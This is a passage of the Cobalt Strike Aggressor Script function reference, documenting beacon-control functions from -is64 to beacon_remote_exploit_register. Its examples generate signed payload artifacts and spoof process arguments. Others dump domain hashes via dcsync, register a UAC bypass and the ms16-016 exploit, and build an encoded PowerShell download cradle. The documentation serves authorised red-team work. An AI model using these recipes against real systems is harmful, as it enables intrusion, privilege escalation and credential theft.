Functions

The following is a list of Aggressor Script's functions:

-hasbootstraphint

Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it's safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.

Arguments

$1 - byte array with a payload or shellcode.

See also

&payload_bootstrap_hint

-is64

Check if a session is on an x64 system or not (Beacon only).

Arguments

$1 - Beacon/Session ID

Example

command x64 {
   foreach $session (beacons()) {
      if (-is64 $session['id']) {
         println($session);
      }
   }
}

Back to Top

-isactive

Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.

Arguments

$1 - Beacon/Session ID

Example

command active {
   local('$bid');
   foreach $bid (beacon_ids()) {
      if (-isactive $bid) {
         println("$bid is active!");
      }
   }
}

Back to Top

-isadmin

Check if a session has admin rights

Arguments

$1 - Beacon/Session ID

Example

command admin_sessions {
   foreach $session (beacons()) {
      if (-isadmin $session['id']) {
         println($session);
      }
   }
}

Back to Top

-isbeacon

Check if a session is a Beacon or not.

Arguments

$1 - Beacon/Session ID

Example

command beacons {
   foreach $session (beacons()) {
      if (-isbeacon $session['id']) {
         println($session);
      }
   }
}

Back to Top

-isssh

Check if a session is an SSH session or not.

Arguments

$1 - Beacon/Session ID

Example

command ssh_sessions {
   foreach $session (beacons()) {
      if (-isssh $session['id']) {
         println($session);
      }
   }
}

Back to Top

action

Post a public action message to the event log. This is similar to the /me command.

Arguments

$1 - the message

Example

action("dances!");

Back to Top

addTab

Create a tab to display a GUI object.

Arguments

$1 - the title of the tab

$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.

$3 - a tooltip to display when a user hovers over this tab.

Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

Back to Top

addVisualization

Register a visualization with Cobalt Strike.

Arguments

$1 - the name of the visualization

$2 - a javax.swing.JComponent object

Example

$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);
See also

&showVisualization

Back to Top

add_to_clipboard

Add text to the clipboard, notify the user.

Arguments

$1 - the text to add to the clipboard

Example

add_to_clipboard("Paste me you fool!");

Back to Top

alias

Creates an alias command in the Beacon console

Arguments

$1 - the alias name to bind to

$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.

Example

alias("foo", {
   btask($1, "foo!");
});

See Also

User Defined Tab Completion

Back to Top

alias_clear

Removes an alias command (and restores default functionality; if it existed)

Arguments

$1 - the alias name to remove

Example

alias_clear("foo");

Back to Top

all_payloads

Generates all of the stageless payloads (in x86 and x64) for all of the configured listeners. (also available in the UI menu under Payloads -> Windows Stageless Generate all Payloads)

Arguments

$1 - The folder path to create the payloads in.

$2 - A boolean value for whether the executable files should be signed.

$3 – A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

$4 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Example

$folder = all_payloads "/tmp/payloads", 1, "None");
println("Payloads have been saved to $folder");

Back to Top

applications

Returns a list of application information in Cobalt Strike's data model. These applications are results from the System Profiler.

Returns

An array of dictionary objects with information about each application.

Example

printAll(applications());

Back to Top

archives

Returns a massive list of archived information about your activity from Cobalt Strike's data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike's reports.

Returns

An array of dictionary objects with information about your team's activity.

Example

foreach $index => $entry (archives()) {
   println("\c3( $+ $index $+ )\o $entry");
}

Back to Top

artifact

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - deprecated; this parameter no longer has any meaning.

$4 - x86|x64 - the architecture of the generated stager

Type Description
dll an x86 DLL
dllx64 an x64 DLL
exe a plain executable
powershell a powershell script
python a python script
svcexe a service executable
vbscript a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

Back to Top

artifact_general

Generates a payload artifact from arbitrary shellcode.

Arguments

$1 - the shellcode

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
svcexe a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Back to Top

artifact_payload

Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 – A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
raw raw payload stage
svcexe a service executable

$6 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Example

$data = artifact_payload("my listener", "exe", "x86", “process”, “Indirect”);

Back to Top

artifact_sign

Sign an EXE or DLL file

Arguments

$1 - the contents of the EXE or DLL file to sign

Notes

  • This function requires that a code-signing certificate is specified in this server's Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
  • DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.

Returns

A scalar containing the signed artifact.

Example

# generate an artifact!
$data = artifact("my listener", "exe");

# sign it.
$data = artifact_sign($data);

# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

Back to Top

artifact_stageless

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload instead.

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener

Arguments

$1 - the listener name (must be local to this team server)

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - proxy configuration string

$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.

Type Description
dll an x86 DLL
dllx64 an x64 DLL
exe a plain executable
powershell a powershell script
python a python script
raw raw payload stage
svcexe a service executable

Notes

  • This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
  • The proxy configuration string is the same string you would use with Payloads -> Windows Stageless Payload. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
  • This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listers with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
  • Note: while the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Example

sub ready {
   local('$handle');
   $handle = openf(">out.exe");
   writeb($handle, $1);
   closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

Back to Top

artifact_stager

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated stager

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
raw the raw file
svcexe a service executable
vbscript a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact_stager("my listener", "exe", "x86");
 
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

Back to Top

barch

Returns the architecture of your Beacon session (e.g., x86 or x64)

Arguments

$1 - the id for the beacon to pull metadata for

Note

If the architecture is unknown (e.g., a DNS Beacon that hasn't sent metadata yet); this function will return x86.

Example

println("Arch is: " . barch($1));

Back to Top

bargue_add

This function adds an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

$3 - the fake arguments to use when the specified command is run.

Notes

  • The process match is exact. If Beacon tries to launch "net.exe", it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
  • x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
  • The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.

Example

# spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");

# spoof net arguments
bargue_add($1, "net", "user guest /active:no");

Back to Top

bargue_list

List the commands + fake arguments Beacon will spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bargue_list($1);

Back to Top

bargue_remove

This function removes an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

Example

# don't spoof cmd.exe
bargue_remove($1, "%COMSPEC%");

Back to Top

base64_decode

Unwrap a base64-encoded string

Arguments

$1 - the string to decode

Returns

The argument processed by a base64 decoder

Example

println(base64_decode(base64_encode("this is a test")));

Back to Top

base64_encode

Base64 encode a string

Arguments

$1 - the string to encode

Returns

The argument processed by a base64 encoder

Example

println(base64_encode("this is a test"));

Back to Top

bbeacon_config

Use this script function with the host command to view and update beacon status and configuration . Use the failover_notification command to control beacon failover notifications

Failover_Notification Command

Use this command to retrieve the current notification setting from a beacon [HTTP|DNS]. Use the [true|false] arguments to enable/disable notifications from a beacon [HTTP|DNS] when host rotation occurs from failover events.

bbeacon_config failover_notification [true | false]

Example

$beacon_id = $1;
bbeacon_config($beacon_id, "failover_notification");
bbeacon_config($beacon_id, "failover_notification", "true");
bbeacon_config($beacon_id, "failover_notification", "false");

Host Command

Use this command to view and update beacon status and configuration of the beacons callback host list.

bbeacon_config [host] [action] [arguments]

where Action and Arguments can be:

Action Description Arguments
add Add a host/uri to the beacons callback host list. The uri must be known by the server. A maximum of 32 hosts may be defined [hostname] [uri]
info Retrieve host callback information from a beacon  
hold Hold a host in the callback host list [Random and Round-Robin rotation only] [hostname]
profiles List the host profiles available in the beacon config  
release Release a host in the callback host list [Random and Round-Robin rotation only] [hostname]
remove Remove a host from the beacons callback host list [hostname]
reset Reset the status and/or statistics for callback hosts [all|status|statistics] [hostname]
update Change the host/uri of an existing host/uri in the host list. The uri must be known by the server. [original-hostname] [new-hostname] [new-uri]

Examples

Add a host to host list

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "add", [hostname], [uri]);

Remove a host

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "remove", [hostname]);

Change a host name

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "update", [original-hostname], [new-hostname]);
bbeacon_config($beacon_id, "host", "update", [original-hostname], [new-hostname], [new-uri]);

List defined host profile host names

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "profiles");

Retrieve host callback information

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "info");

Reset status/statistics

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "reset", "[all|status|statistics]");
bbeacon_config($beacon_id, "host", "reset", "[all|status|statistics]", [hostname]);
NOTE:

Resetting status will reset:

- Host held setting

Resetting statistics will reset:

- Last successful connection timestamp

- Last failed connection timestamp

- Successful connection count

- Failed connection count

Back to Top

bblockdlls

Launch child processes with binary signature policy that blocks non-Microsoft DLLs from loading in the process space.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - true or false; block non-Microsoft DLLs in child process

Note

This attribute is available in Windows 10 only.

Example

on beacon_initial {
   binput($1, "blockdlls start");
   bblockdlls($1, true);
}

Back to Top

bbrowser

Generate the beacon browser GUI component. Shows only Beacons.

Returns

The beacon browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Beacon Browser", bbrowser());
See also

&showVisualization

Back to Top

bbrowserpivot

Start a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the browser pivot agent into.

$3 - the architecture of the target PID (x86|x64)

Example

bbrowserpivot($1, 1234, "x86");

Back to Top

bbrowserpivot_stop

Stop a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bbrowserpivot_stop($1);

Back to Top

bbypassuac

REMOVED Removed in Cobalt Strike 4.0.

Back to Top

bcancel

Cancel a file download

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to cancel or a wildcard.

Example

item "&Cancel Downloads" {
   bcancel($1, "*");
}

Back to Top

bcd

Ask a Beacon to change it's current working directory.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to change to.

Example

# create a command to change to the user's home directory
alias home {
   $home = "c:\\users\\" . binfo($1, "user");
   bcd($1, $home);
}

Back to Top

bcheckin

Ask a Beacon to checkin. This is basically a no-op for Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Checkin" {
   binput($1, "checkin");
   bcheckin($1);
}

Back to Top

bclear

This is the "oops" command. It clears the queued tasks for the specified beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclear($1);

Back to Top

bclipboard

Ask beacon to get the text clipboard contents.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclipboard($1);

Back to Top

bconnect

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to connect to

$3 - (optional) the port to use. Default profile port is used otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

bconnect($1, "DC");

Back to Top

bcovertvpn

Ask Beacon to deploy a Covert VPN client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the Covert VPN interface to deploy

$3 - the IP address of the interface [on target] to bridge into

$4 - (optional) the MAC address of the Covert VPN interface

Example

bcovertvpn($1, "phear0", "172.16.48.18");

Back to Top

bcp

Ask Beacon to copy a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to copy

$3 - the destination

Example

bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

Back to Top

bdata

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(bdata("1234"));

Back to Top

bdata_store_list

List the post-ex items currently available in the data store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bdata_store_list($1);

Back to Top

bdata_store_load

Load post-ex items to Beacon. This provides a mechanism to upload data and then query it via BOFs using APIs such as BeaconStoreGetItem().

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - item type [bof|dotnet|file]

$3 - file path

$4 - (optional) item name (If omitted, the file name is used).

Example

alias "data_store_load" {
blog($1, "Loading data store...");
bdata_store_load($1, "bof", "/home/someone/file.bof");
bdata_store_load($1, "dotnet", "/home/someone/file.dotnet");
bdata_store_load($1, "file", "/home/someone/file.data");
blog($1, "Loaded data store...");
} alias "data_store_load_with_name" {
blog($1, "Loading data store with names...");
bdata_store_load($1, "bof", "/home/someone/file.bof", "myBof");
bdata_store_load($1, "dotnet", "/home/someone/file.dotnet", "myDotNet");
bdata_store_load($1, "file", "/home/someone/file.data", "myData");
blog($1, "Loaded data store with names...");
}

bdata_store_unload

Remove specific post-ex item from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - index

Example

bdata_store_unload($1, parseNumber($2));

Back to Top

bdcsync

Use mimikatz's dcsync command to pull a user's password hash from a domain controller. This function requires a domain administrator trust relationship.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - fully qualified name of the domain

$3 - (optional) DOMAIN\user to pull hashes for

$4 - (optional) the PID to inject the dcsync command into or $null

$5 - (optional) the architecture of the target PID (x86|x64) or $null

Note

If $3 is left out, dcsync will dump all domain hashes.

Examples

Spawn a temporary process
# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab");
Inject into the specified process
# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");

Back to Top

bdesktop

Start a VNC session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Desktop (VNC)" {
   bdesktop($1); 
}

Back to Top

bdllinject

Inject a Reflective DLL into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the DLL into

$3 - the local path to the Reflective DLL

Example

bdllinject($1, 1234, script_resource("test.dll"));

Back to Top

bdllload

Call LoadLibrary() in a remote process with the specified DLL.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target process PID

$3 - the on-target path to a DLL

Note

The DLL must be the same architecture as the target process.

Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

Back to Top

bdllspawn

Spawn a Reflective DLL as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the Reflective DLL

$3 - a parameter to pass to the DLL

$4 - a short description of this post exploitation job (shows up in jobs output)

$5 - wait time for returned data specified in milliseconds (5000 = 5 seconds)

$6 - true/false; use impersonated token when running this post-ex job?

$7 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Notes

  • This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
  • A well-behaved Reflective DLL follows these rules:
    • Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
    • Prints messages to STDOUT
    • Calls fflush(stdout) to flush STDOUT
    • Calls ExitProcess(0) when done. This kills the spawned process to host the capability.

Example (ReflectiveDll.c)

This example is based on Stephen Fewer's Reflective DLL Injection Project:

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
   BOOL bReturnValue = TRUE;
   switch( dwReason ) {
      case DLL_QUERY_HMODULE:
         if( lpReserved != NULL )
            *(HMODULE *)lpReserved = hAppInstance;
         break;
      case DLL_PROCESS_ATTACH:
         hAppInstance = hinstDLL;
   
         /* print some output to the operator */
         if (lpReserved != NULL) {
            printf("Hello from test.dll. 
            Parameter is '%s'\n", (char *)lpReserved);
         }
         else {
            printf("Hello from test.dll. There is no parameter\n");
         }

         /* flush STDOUT */
         fflush(stdout);

         /* we're done, so let's exit */
         ExitProcess(0);
         break;
      case DLL_PROCESS_DETACH:
      case DLL_THREAD_ATTACH:
      case DLL_THREAD_DETACH:
         break;
   }
   return bReturnValue;
}

Example (Aggressor Script)

alias hello {
   bdllspawn($1, script_resource("reflective_dll.dll"), $2, 
   "test dll", 5000, false);
}

Back to Top

bdownload

Ask a Beacon to download a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to request

Example

bdownload($1, "c:\\sysprep.inf");

Back to Top

bdrives

Ask Beacon to list the drives on the compromised system

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Drives" {
   binput($1, "drives");
   bdrives($1);
}

Back to Top

beacon_command_describe

Describe a Beacon command.

Returns

A string description of the Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_describe("ls"));

Back to Top

beacon_command_detail

Get the help information for a Beacon command.

Returns

A string with helpful information about a Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_detail("ls"));

Back to Top

beacon_command_register

Register help information for a Beacon command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

alis echo {
   blog($1, "You typed: " . substr($1, 5));
}

beacon_command_register(
   "echo", 
   "echo text to beacon log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

See Also

User Defined Tab Completion

Back to Top

beacon_commands

Get a list of Beacon commands.

Returns

An array of Beacon commands.

Example

printAll(beacon_commands());

Back to Top

beacon_data

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(beacon_data("1234"));

Back to Top

beacon_elevator_describe

Describe a Beacon command elevator exploit

Returns

A string description of the Beacon command elevator

Arguments

$1 - the exploit

Example

println(beacon_elevator_describe("uac-token-duplication"));
See Also

&beacon_elevator_register, &beacon_elevators, &belevate_command

Back to Top

beacon_elevator_register

Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)

Example

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
   local('$handle $script $oneliner $command');

   # acknowledge this command
   btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

   # read in the script
   $handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
   $script = readb($handle, -1);
   closef($handle);

   # host the script in Beacon
   $oneliner = beacon_host_script($1, $script);

   # base64 encode the command
   $command  = transform($2, "powershell-base64");

   # run the specified command via this exploit.
   bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);
See Also

&beacon_elevator_describe, &beacon_elevators, &belevate_command

Back to Top

beacon_elevators

Get a list of command elevator exploits registered with Cobalt Strike.

Returns

An array of Beacon command elevators

Example

printAll(beacon_elevators());
See also

&beacon_elevator_describe, &beacon_elevator_register, &belevate_command

Back to Top

beacon_execute_job

Run a command and report its output to the user.

Arguments

$1 - the Beacon ID

$2 - the command to run (environment variables are resolved)

$3 - the command arguments (environment variables are not resolved).

$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)

Notes

  • The string $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
  • This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
   local('$args');
   $args = substr($0, 6);
   btask($1, "Tasked beacon to run: $args", "T1059");
   beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

Back to Top

beacon_execute_postex_job

Execute a user defined post exploitation task.

Arguments

$1 - the PID to inject the task or $null for using fork&run

$2 - a string containing the postex DLL

$3 - (optional) packed arguments to pass to the postex task

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

$5 - (optional) the message id type for the postex task. Defaults to CALLBACK_POSTEX_KIT

See Also:

Postex Kit

Back to Top

beacon_exploit_describe

Describe a Beacon exploit

Returns

A string description of the Beacon exploit

Arguments

$1 - the exploit

Example

println(beacon_exploit_describe("ms14-058"));
See Also

&beacon_exploit_register, &beacon_exploits, &belevate

Back to Top

beacon_exploit_register

Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)

Example

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
   local('$stager');
   
   # check if we're on an x64 system and error out.
   if (-is64 $1) {
      berror($1, "ms16-016 exploit is x86 only");
      return;
   }

   # acknowledge this command
   btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

   # generate our shellcode
   $stager = payload($2, "x86");

   # spawn a Beacon post-ex job with the exploit DLL
   bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

   # link to our payload if it's a TCP or SMB Beacon
   beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);
See Also

&beacon_exploit_describe, &beacon_exploits, &belevate

Back to Top

beacon_exploits

Get a list of privilege escalation exploits registered with Cobalt Strike.

Returns

An array of Beacon exploits.

Example

printAll(beacon_exploits());
See also

&beacon_exploit_describe, &beacon_exploit_register, &belevate

Back to Top

beacon_host_imported_script

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.

Arguments

$1 - the id of the Beacon to host this script with.

Returns

A short PowerShell script to download and evaluate the previously script when run. How this one-liner is used is up to you!

Example

alias powershell {
   local('$args $cradle $runme $cmd');
   
   # $0 is the entire command with no parsing.
   $args   = substr($0, 11);
   
   # generate the download cradle (if one exists) for an imported PowerShell script
   $cradle = beacon_host_imported_script($1);
   
   # encode our download cradle AND cmdlet+args we want to run
   $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
   
   # Build up our entire command line.
   $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
   
   # task Beacon to run all of this.
   btask($1, "Tasked beacon to run: $args", "T1086");
   beacon_execute_job($1, "powershell", $cmd, 1);
}

Back to Top

beacon_host_script

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.

Arguments

$1 - the id of the Beacon to host this script with.

$2 - the script data to host.

Returns

A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!

Example

alias test {
   local('$script $hosted');
   $script = "2 + 2";
   $hosted = beacon_host_script($1, $script);
   
   binput($1, "powerpick $hosted");
   bpowerpick($1, $hosted);
}

Back to Top

beacon_ids

Get the ID of all Beacons calling back to this Cobalt Strike team server.

Returns

An array of beacon IDs

Example

foreach $bid (beacon_ids()) {
   println("Bid: $bid");
}

Back to Top

beacon_info

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

Back to Top

beacon_inline_execute

Execute a Beacon Object File

Arguments

$1 - the id for the Beacon

$2 - a string containing the BOF file

$3 - the entry point to call

$4 - packed arguments to pass to the BOF file

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Note

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Example (hello.c)

/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/

#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"

void demo(char * args, int length) {
   datap  parser;
   char * str_arg;
   int    num_arg;
   
   BeaconDataParse(&parser, args, length);
   str_arg = BeaconDataExtract(&parser, NULL);
   num_arg = BeaconDataInt(&parser);
   
   BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

Example (hello.cna)

alias hello {
   local('$barch $handle $data $args');

   # figure out the arch of this session
   $barch  = barch($1);

   # read in the right BOF file
   $handle = openf(script_resource("hello. $+ $barch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);

   # pack our arguments
   $args   = bof_pack($1, "zi", "Hello World", 1234);

   # announce what we're doing
   btask($1, "Running Hello BOF");
   
   # execute it.
   beacon_inline_execute($1, $data, "demo", $args);
}
See Also

&bof_pack

Back to Top

beacon_job_hide_output

Hide or show the output of a specific job in Beacon console.

Arguments

$1 - the Beacon id

$2 - the Job id

$3 - 1 for hide, 0 for show

Example

beacon_job_hide_output($bid, $jid, 1);   # Hide the output
beacon_job_hide_output($bid, $jid, 0);   # Show the output

Back to Top

beacon_job_name

Set the name for a specific job entry.

Arguments

$1 - the Beacon id

$2 - the Job id

$3 - the new job name

Back to Top

beacon_link

This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.

Arguments

$1 - the id of the beacon to link through

$2 - the target host to link to. Use $null for localhost.

$3 - the listener to link

Example

# smartlink [target] [listener name]
alias smartlink {
   beacon_link($1, $2, $3);
}

Back to Top

beacon_remote_exec_method_describe

Describe a Beacon remote execute method

Returns

A string description of the Beacon remote execute method.

Arguments

$1 - the method

Example

println(beacon_remote_exec_method_describe("wmi"));
See also

&beacon_remote_exec_method_register, &beacon_remote_exec_methods, &bremote_exec

Back to Top

beacon_remote_exec_method_register

Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.

Arguments

$1 - the method short name

$2 - a description of the method

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the command+args)

See Also

&beacon_remote_exec_method_describe, &beacon_remote_exec_methods, &bremote_exec

Back to Top

beacon_remote_exec_methods

Get a list of remote execute methods registered with Cobalt Strike.

Returns

An array of remote exec modules.

Example

printAll(beacon_remote_exec_methods());
See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &bremote_exec

Back to Top

beacon_remote_exploit_arch

Get the arch info for this Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

x86 or x64

Example

println(beacon_remote_exploit_arch("psexec"));
See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

Back to Top

beacon_remote_exploit_describe

Describe a Beacon lateral movement option.

Returns

A string description of the Beacon lateral movement option.

Arguments

$1 - the exploit

Example

println(beacon_remote_exploit_describe("psexec"));
See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

Back to Top

beacon_remote_exploit_register

Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.

Arguments

$1 - the exploit short name

$2 - the arch associated with this attack (e.g., x86, x64)

$3 - a description of the exploit

